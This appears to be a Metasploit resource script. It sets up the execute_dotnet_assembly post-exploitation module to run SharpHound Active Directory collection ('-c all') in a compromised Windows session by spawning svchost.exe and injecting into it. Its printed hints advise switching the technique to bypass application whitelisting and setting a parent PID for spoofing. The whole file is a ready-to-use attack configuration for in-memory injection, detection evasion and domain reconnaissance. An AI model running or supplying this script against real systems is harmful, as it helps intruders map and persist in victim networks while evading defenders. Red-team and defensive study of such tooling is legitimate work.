<ruby>
CWD = Dir.pwd
DOTNET_EXE = "#{CWD}/dotnet/SharpHound.exe"
ARGUMENTS = '-c all -s'
TECHNIQUE = 'SPAWN_AND_INJECT'
KILL = 'true'
PROCESS = 'svchost.exe'
run_single('use post/windows/manage/execute_dotnet_assembly')
run_single("set ARGUMENTS #{ARGUMENTS}")
run_single("set DOTNET_EXE #{DOTNET_EXE}")
run_single("set TECHNIQUE #{TECHNIQUE}")
run_single("set KILL #{KILL}")
run_single("show options missing")

puts ">>> TODO"
unless defined?(SESSION)
  puts "> Set your SESSION"
end

puts "> Change TECHNIQUE if app whitelisting bypass is needed/etc"
puts "> set PPID for ppid spoofing"
sleep(1)
</ruby>
